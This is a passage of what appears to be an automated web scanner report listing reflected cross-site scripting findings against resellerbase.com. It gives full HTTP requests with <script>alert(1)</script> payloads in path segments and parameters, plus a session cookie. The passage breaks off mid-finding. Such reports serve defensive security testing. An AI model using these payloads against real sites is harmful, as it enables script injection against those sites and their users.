...[SNIP]...

2.2589. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8770<script>alert(1)</script>4fcb4e8a784 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild8770<script>alert(1)</script>4fcb4e8a784/38/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild8770<script>alert(1)</script>4fcb4e8a784/38/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2590. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43a06<script>alert(1)</script>1a967185a30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3843a06<script>alert(1)</script>1a967185a30/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3843a06<script>alert(1)</script>1a967185a30/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2591. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0857<script>alert(1)</script>273ae194b4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themesb0857<script>alert(1)</script>273ae194b4c/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themesb0857<script>alert(1)</script>273ae194b4c/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2592. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8b1cc<script>alert(1)</script>8434eed3dd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos8b1cc<script>alert(1)</script>8434eed3dd5/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos8b1cc<script>alert(1)</script>8434eed3dd5/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2593. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1854<script>alert(1)</script>ceeb028280d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/imagesc1854<script>alert(1)</script>ceeb028280d/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/imagesc1854<script>alert(1)</script>ceeb028280d/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2594. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 55271<script>alert(1)</script>f1d21cf50f3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating55271<script>alert(1)</script>f1d21cf50f3/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating55271<script>alert(1)</script>f1d21cf50f3/0.gif was not found on this server.</p>
...[SNIP]...

2.2595. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f5de0<script>alert(1)</script>5189009678a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/0.giff5de0<script>alert(1)</script>5189009678a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/0.giff5de0<script>alert(1)</script>5189009678a was not found on this server.</p>
...[SNIP]...

2.2596. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47707<script>alert(1)</script>38cad12fc6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/0.gif?47707<script>alert(1)</script>38cad12fc6d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/0.gif?47707<script>alert(1)</script>38cad12fc6d=1 was not found on this server.</p>
...[SNIP]...

2.2597. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ef3b<script>alert(1)</script>f621369958c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6ef3b<script>alert(1)</script>f621369958c/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6ef3b<script>alert(1)</script>f621369958c/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2598. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54c8f<script>alert(1)</script>bf93c9e3b82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3854c8f<script>alert(1)</script>bf93c9e3b82/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3854c8f<script>alert(1)</script>bf93c9e3b82/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2599. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 65b0f<script>alert(1)</script>5e2660d7080 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes65b0f<script>alert(1)</script>5e2660d7080/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes65b0f<script>alert(1)</script>5e2660d7080/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2600. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 723ff<script>alert(1)</script>fde72a4253 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos723ff<script>alert(1)</script>fde72a4253/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos723ff<script>alert(1)</script>fde72a4253/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2601. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload be69e<script>alert(1)</script>b5564eb1659 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/imagesbe69e<script>alert(1)</script>b5564eb1659/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/imagesbe69e<script>alert(1)</script>b5564eb1659/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2602. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6cd32<script>alert(1)</script>d1e6ca62f7f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating6cd32<script>alert(1)</script>d1e6ca62f7f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating6cd32<script>alert(1)</script>d1e6ca62f7f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2603. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 989f9<script>alert(1)</script>08f2356a29d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/search.php989f9<script>alert(1)</script>08f2356a29d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php989f9<script>alert(1)</script>08f2356a29d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2604. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7903d<a>a752bd2c4ca was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7903d<a>a752bd2c4ca&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search7903d<a>a752bd2c4ca&opt=2 was not found on this server.</p>
...[SNIP]...

2.2605. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a22ff<a>c8a637b9555 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...a22ff<a>c8a637b9555&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...a22ff<a>c8a637b9555&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2606. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f53c8<script>alert(1)</script>89d9ce54913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f53c8<script>alert(1)</script>89d9ce54913=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f53c8<script>alert(1)</script>89d9ce54913=1 was not found on this server.</p>
...[SNIP]...

2.2607. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d0955<a>3143424d8f8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

